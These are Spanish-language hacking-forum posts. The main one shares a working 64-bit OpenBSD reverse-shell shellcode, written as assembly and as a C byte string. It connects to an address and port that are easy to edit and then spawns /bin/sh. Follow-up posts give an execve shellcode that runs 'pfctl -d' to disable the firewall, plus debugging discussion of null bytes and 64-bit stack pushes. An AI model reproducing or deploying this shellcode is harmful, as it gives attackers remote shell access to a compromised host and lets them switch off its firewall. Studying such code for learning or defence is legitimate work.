Mensajes

Cual es la parte que no entiendes bien?

Un saludo.

Hola

Para poner en practica los conocimientos que voy adquiriendo en ASM, hice una pequeña reverse shell de 64bits.

Esta testeada en OpenBSD y en nivel local, no remoto, solo es para poner en practica mis conocimientos, eso lo dejo bien claro.

Código (asm) [Seleccionar] Expandir

.section .text
.globl _start

_start:

incb %al
pushq %rax
popq %rsi
incb %al
pushq %rax                      //socket
popq %rdi
orb $0x4, %al
pushq %rax
popq %rdx
addb $0x5b, %al
syscall

xchgq %rax, %rdi            //descriptor

movq $0x0100007f4dbc02ff, %rbx        //sockaddr_in
pushq %rbx

movq %rsp, %rsi
movb $0x10, %dl                   //connect
orb $0x60, %al
syscall

xorq %rsi, %rsi

C.0:

movb $0x5a, %al
syscall
incb %sil                             //dup2 0,1,2
cmpb $0x03, %sil

loopne C.0

movq $0x68732f6e69622fff, %rbx
shrq $0x8, %rbx
pushq %rbx
movq %rsp, %rdi
xorb %al, %al                       //execve sh
pushq %rax
movq %rsp, %rsi
xchgq %rax, %rdx
addb $0x2b, %al
syscall

xorb %al, %al     

C:

Código (c) [Seleccionar] Expandir

"\xfe\xc0\x50\x5e\xfe\xc0\x50\x5f\x0c\x04\x50\x5a"
"\x04\x5b\x0f\x05\x48\x97\x48\xbb\xff\x02"
"\xbc\x4d"                  // puerto
"\x7f\x00\x00\x01"         // direccion
"\x53\x48\x89\xe6\xb2\x10\x0c\x60\x0f\x05\x48\x31"
"\xf6\xb0\x5a\x0f\x05\x48\xff\xc6\x48\x83\xfe\x03"
"\xe0\xf3\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
"\x48\xc1\xeb\x08\x53\x48\x89\xe7\x30\xc0\x50\x48"
"\x89\xe6\x48\x92\x04\x2b\x0f\x05\x30\xc0";

Cualquier pregrunta sobre el código no os cortéis.

Un saludo.

syscall.h, las tienes en el sistema.

Un saludo.

Exacto, tú mismo contestaste tú pregunta, si no moviera esos 5 byte seria así:

Código (asm) [Seleccionar] Expandir

0x6c7463ffffffffff
0x66702f6e6962732f

Y el de 32 bits no funciona por culpa de los byte nulos, por eso solo reconoce //sb.

Un saludo.

P.D: Hice como un ejercicio con la syscall write, lo quieres?

Código (asm) [Seleccionar] Expandir

.section .text
.globl _start

_start:

pushq %rax
pushw $0x642d
movq %rsp, %r8
movq $0x6c7463ffffffffff, %rax
shrq $0x28, %rax
pushq %rax
movq $0x66702f6e6962732f, %rax
pushq %rax
movq %rsp, %rdi
xchgq %rax, %r9
pushq %rax
pushq %r8
pushq %rdi
movq %rsp, %rsi
movb $0x3b, %al
syscall

Mueve 40 bits ala derecha, las ff, dejando espacio para la segunda dirección.

Miraré los manuales de intel o amd tendra que poner algo sobre el stack de 64 bits, en la arquitectura de 32 bits no hace falta mover bits, no sé es como si la de 64 bits no reservara espacio, no lo entiendo del todo.

Un saludo.

P.D: Tema resuelto.

No entendiste mí pregunta, si puedo hacer push con esas direcciones de 32 bits lo que pasa es que solo copia la primera dirección las otras dos no.

Código (asm) [Seleccionar] Expandir


push $0x6c746366
push $0x702f6e69
push $0x62732f2f    #  //sb

Código [Seleccionar] Expandir

11277 l        CALL  execve(0x7f7fffff6960,0x7f7fffff6948,0)
11277 l        NAMI "//sb"
11277 l        RET   execve -1 errno 2 No such file or directory
11277 l        CALL  exit(0x7f7fffff6960)

Pero en una arquitectura de 32 bits si que funcionan.

En cuanto a tú solución, no la liaste, pero las q no afectan en nada eso ya lo probé antes de que lo dijeras, como dice ese fragmento sacado de los manuales de AMD si que puedo hacer push a 16-bit pero me deja un opcode (bad).

La solución es mover bits ala derecha con shr, así funciono, lo probé con otro código, cuando lo tenga implementado en la shellcode lo subo.

Un saludo.

P.D: La shellcode de /bin/sh pesa un byte menos con un xchg.

P.D2: Todo esto lo quiero implementar en una reverse shell, pero nose si se pueden subir esos códigos al foro.

Perdón por el triple post.

Probé los push en una arquitectura de 32 bits y funcionan, porque en la de 64 bits no?

¿Como podría hacer eso en la de 64 bits?

Un saludo.

No sé, solo te dije lo de trazar porque me ayudo con unos SIGBUS y Segmentation fault, pero ya veo que no te sirvió de mucho.

Siento no poder ayudarte.

Un saludo.

P.D: Repasa las estructuras de los cabezales.

La trazastes, para mirar de donde viene ese SIGTERM?

Un saludo.

Hola

Mi pregunta es: ¿hay alguna manera de conseguir que el p*** iptables desbloquee el solito esa ip/rango al cabo de X tiempo?

Iptables tiene un módulo de tiempo, llamado time, puedes decirle el tiempo para que la regla se aplique y cuando no.

Un saludo.